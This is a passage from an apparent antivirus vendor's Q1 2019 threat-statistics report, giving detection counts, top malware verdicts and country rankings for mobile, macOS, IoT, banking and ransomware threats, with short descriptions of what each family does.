Trojans, including Asacub.\n\nSeventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:\n\n * It is extremely difficult for an ordinary user to determine whether their device is already infected.\n * Getting rid of such malware is highly complex.\n\nThe Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.\n\nThe last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.\n\n### Geography of mobile threats\n\n_Map of mobile malware infection attempts, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172806/en-mobile-malware-map.png>)\n\nTop 10 countries by share of users attacked by mobile malware:\n\n| Country* | %** \n---|---|--- \n1 | Pakistan | 37.54 \n2 | Iran | 31.55 \n3 | Bangladesh | 28.38 \n4 | Algeria | 24.03 \n5 | Nigeria | 22.59 \n6 | India | 21.53 \n7 | Tanzania | 20.71 \n8 | Indonesia | 17.16 \n9 | Kenya | 16.27 \n10 | Mexico | 12.01 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nPakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.\n\nSecond place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy \u2013 the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.\n\nThird place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **29,841** installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.\n\nThe greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.\n\n_Number of installation packages for mobile banking Trojans, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171308/banking-malware-apk.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.snt | 23.32 \n2 | Trojan-Banker.AndroidOS.Asacub.a | 16.35 \n3 | Trojan-Banker.AndroidOS.Agent.ep | 11.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 8.57 \n5 | Trojan-Banker.AndroidOS.Asacub.cp | 8.33 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.96 \n7 | Trojan-Banker.AndroidOS.Svpeng.ak | 7.00 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 4.96 \n9 | Trojan-Banker.AndroidOS.Asacub.ar | 2.47 \n10 | Trojan-Banker.AndroidOS.Hqwar.t | 2.10 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by banking threats._\n\nThis time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.\n\nIt was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals' transition to a two-stage system of infection using Hqwar droppers.\n\n_Geography of mobile banking threats, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171335/en-banking-malware-map.png>)\n\n**Top 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Australia | 0.81 \n2 | Turkey | 0.73 \n3 | Russia | 0.64 \n4 | South Africa | 0.35 \n5 | Ukraine | 0.31 \n6 | Tajikistan | 0.25 \n7 | Armenia | 0.23 \n8 | Kyrgyzstan | 0.17 \n9 | US | 0.16 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nIn Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Both types of malware are not exclusive to Australia, and used for attacks worldwide.\n\nSecond place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.\n\nRussia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.\n\n### Mobile ransomware\n\nIn Q1 2019, we detected **27,928** installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.\n\n_Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 \u2013 Q1 2019)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171455/mobile-ransomware.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ah | 28.91 \n2 | Trojan-Ransom.AndroidOS.Rkor.h | 19.42 \n3 | Trojan-Ransom.AndroidOS.Svpeng.aj | 9.46 \n4 | Trojan-Ransom.AndroidOS.Small.as | 8.81 \n5 | Trojan-Ransom.AndroidOS.Rkor.snt | 5.36 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 5.21 \n7 | Trojan-Ransom.AndroidOS.Small.o | 3.24 \n8 | Trojan-Ransom.AndroidOS.Fusob.h | 2.74 \n9 | Trojan-Ransom.AndroidOS.Small.ce | 2.49 \n10 | Trojan-Ransom.AndroidOS.Svpeng.snt | 2.33 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by ransomware._\n\nIn Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.\n\n_Geography of mobile ransomware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171523/en-mobile-ransomware-map.png>)\n\nTop 10 countries by share of users attacked by mobile ransomware:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.54 \n2 | Kazakhstan | 0.36 \n3 | Iran | 0.28 \n4 | Pakistan | 0.14 \n5 | Mexico | 0.10 \n6 | Saudi Arabia | 0.10 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Indonesia | 0.05 \n10 | Belgium | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nThe Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%)\n\n## Attacks on Apple macOS\n\nOn the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.\n\nThe modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:\n\n 1. The code that displays the advertising banner to run as often as possible on the infected machine,\n 2. The victim to click on the banners as often as possible,\n 3. As many victims as possible.\n\nIt should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.62 \n2 | AdWare.OSX.Spc.a | 20.07 \n3 | AdWare.OSX.Pirrit.j | 10.31 \n4 | AdWare.OSX.Pirrit.p | 8.44 \n5 | AdWare.OSX.Agent.b | 8.03 \n6 | AdWare.OSX.Pirrit.o | 7.45 \n7 | AdWare.OSX.Pirrit.s | 6.88 \n8 | AdWare.OSX.Agent.c | 6.03 \n9 | AdWare.OSX.MacSearch.a | 5.95 \n10 | AdWare.OSX.Cimpli.d | 5.72 \n11 | AdWare.OSX.Mcp.a | 5.71 \n12 | AdWare.OSX.Pirrit.q | 5.55 \n13 | AdWare.OSX.MacSearch.d | 4.48 \n14 | AdWare.OSX.Agent.a | 4.39 \n15 | Downloader.OSX.InstallCore.ab | 3.88 \n16 | AdWare.OSX.Geonei.ap | 3.75 \n17 | AdWare.OSX.MacSearch.b | 3.48 \n18 | AdWare.OSX.Geonei.l | 3.42 \n19 | AdWare.OSX.Bnodlero.q | 3.33 \n20 | RiskTool.OSX.Spigot.a | 3.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's security solutions for macOS that were attacked._\n\nTrojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.\n\nAdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various \"cleaner\" programs for macOS. After installation, they write themselves to the autoloader and run in the background.\n\nMembers of the AdWare.OSX.Pirrit family add extensions to the victim's browser; some versions also install a proxy server on the victim's machine to intercept traffic from the browser. All this serves one purpose \u2013 to inject advertising into web pages viewed by the user.\n\nThe malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.\n\nAdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim's browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user's knowledge.\n\nAdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim's browser.\n\nThe creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.\n\nThe AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs creator-owned obfuscation techniques to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web-page.\n\nLike other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user's browser, and changes the default search engine and home page. What's more, it can download and install other advertising apps.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.54 \n2 | Spain | 9.75 \n3 | India | 8.83 \n4 | Italy | 8.20 \n5 | US | 8.03 \n6 | Canada | 7.94 \n7 | UK | 7.52 \n8 | Russia | 7.51 \n9 | Brazil | 7.45 \n10 | Mexico | 6.99 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky Lab's security solutions for macOS in the country._\n\nIn Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a \u0438 AdWare.OSX.Bnodlero.q.\n\nUsers from Spain (9.75%), India (8.83%), and Italy (8.20%) \u2013 who ranked second, third, and fourth, respectively \u2013 most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare .OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b\n\nFifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Climpi family.\n\n## IoT attacks\n\n### Interesting events\n\nIn Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. The implementation was primitive \u2013 scanning for the presence of procfs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png>)\n\nBut we expect it to become more complex in the near future.\n\nSecond, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain \"mirai\" in the process name):\n\n * dvrhelper\n * dvrsupport\n * **mirai**\n * blade\n * demon\n * hoho\n * hakai\n * satori\n * messiah\n * mips\n\nLastly, a few words about a miner with an old exploit for Oracle Weblogic Server, although it is not actually an IoT malware, but a Trojan for Linux.\n\nTaking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png>)\n\n_Section of code responsible for attacking Windows and Linux hosts_\n\n### IoT threat statistics\n\nQ1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that it has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come. \n \nSSH | 17% \nTelnet | 83% \n \n_Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019_\n\nNevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab's traps. \n \nSSH | 64% \nTelnet | 36% \n \n_Table of distribution of cybercriminal working sessions with Kaspersky Lab's traps, Q1 2019_\n\nIf attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's telnet traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171650/en-iot-telnet-map.png>)\n\nTop 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | Egypt | 13.46 \n2 | China | 13.19 \n3 | Brazil | 11.09 \n4 | Russia | 7.17 \n5 | Greece | 4.45 \n6 | Jordan | 4.14 \n7 | US | 4.12 \n8 | Iran | 3.24 \n9 | India | 3.14 \n10 | Turkey | 2.49 \n \n_* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet._\n\nIn Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab's traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.\n\nCybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.\n\n**Top 10 malware downloaded to infected IoT devices following a successful telnet attack**\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 71.39 \n2 | Backdoor.Linux.Mirai.ba | 20.15 \n3 | Backdoor.Linux.Mirai.au | 4.85 \n4 | Backdoor.Linux.Mirai.c | 1.35 \n5 | Backdoor.Linux.Mirai.h | 1.23 \n6 | Backdoor.Linux.Mirai.bj | 0.72 \n7 | Trojan-Downloader.Shell.Agent.p | 0.06 \n8 | Backdoor.Linux.Hajime.b | 0.06 \n9 | Backdoor.Linux.Mirai.s | 0.06 \n10 | Backdoor.Linux.Gafgyt.bj | 0.04 \n \n_* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack_\n\nIt is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai's universality.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's SSH traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171814/en-iot-ssh-map.png>)\n\nTop 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab's traps.\n\n| Verdict | %* \n---|---|--- \n1 | China | 23.24 \n2 | US | 9.60 \n3 | Russia | 6.07 \n4 | Brazil | 5.31 \n5 | Germany | 4.20 \n6 | Vietnam | 4.11 \n7 | France | 3.88 \n8 | India | 3.55 \n9 | Egypt | 2.53 \n10 | Korea | 2.10 \n \n_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH_\n\nMost often, a successful SSH-based attack resulted in the following types of malware downloaded of victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p\n\n## Financial threats\n\n### Quarterly highlights\n\nThe banker Trojan DanaBot, detected in [Q2](<https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>), continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.\n\nRecall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.\n\n### Financial threat statistics\n\nIn Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.\n\n_Number of unique users attacked by financial malware, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171934/en-finance.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23125708/en-finance-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country*** | **%**** \n---|--- \nSouth Korea | 2.2 \nChina | 2.1 \nBelarus | 1.6 \nVenezuela | 1.6 \nSerbia | 1.6 \nGreece | 1.5 \nEgypt | 1.4 \nPakistan | 1.3 \nCameroon | 1.3 \nZimbabwe | 1.3 \n \n_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 27.42 \n2 | Zbot | Trojan.Win32.Zbot | 22.86 \n3 | Emotet | Backdoor.Win32.Emotet | 9.36 \n4 | Trickster | Trojan.Win32.Trickster | 6.57 \n5 | Nymaim | Trojan.Win32.Nymaim | 5.85 \n6 | Nimnul | Virus.Win32.Nimnul | 4.59 \n7 | SpyEye | Backdoor.Win32.SpyEye | 4.29 \n8 | Neurevt | Trojan.Win32.Neurevt | 3.56 \n9 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.64 \n10 | Tinba | Trojan-Banker.Win32.Tinba | 1.39 \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe most high-profile event of the quarter was probably the [LockerGoga ransomware attack](<https://ics-cert.kaspersky.com/news/2019/03/22/metallurgical-giant-norsk-hydro-attacked-by-encrypting-malware/>) on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.\n\nA vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. The cybercriminals did not miss the chance to [assemble an archive](<https://www.bleepingcomputer.com/news/security/jneca-ransomware-spread-by-winrar-ace-exploit/>) that unpacks the executable file of the JNEC ransomware into the system autorun directory.\n\nFebruary saw [attacks](<https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/>) on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What's more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.\n\nNomoreransom.org partners, in cooperation with cyber police, [created](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.\n\n### Statistics\n\n#### Number of new modifications\n\nThe number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.\n\n_Number of new ransomware modifications, Q1 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172044/ransomware-new-modification.png>)\n\n#### Number of users attacked by ransomware Trojans\n\nIn Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.\n\nIn February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172107/en-ransomware-users.png>)\n\n### Attack geography\n\nGeography of mobile ransomware Trojans, Q1 2019[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171149/en-ransomware-map.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 8.11 \n2 | Uzbekistan | 6.36 \n3 | Ethiopia | 2.61 \n4 | Mozambique | 2.28 \n5 | Nepal | 2.09 \n6 | Vietnam | 1.37 \n7 | Pakistan | 1.14 \n8 | Afghanistan | 1.13 \n9 | India | 1.11 \n10 | Indonesia | 1.07 \n \n* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique
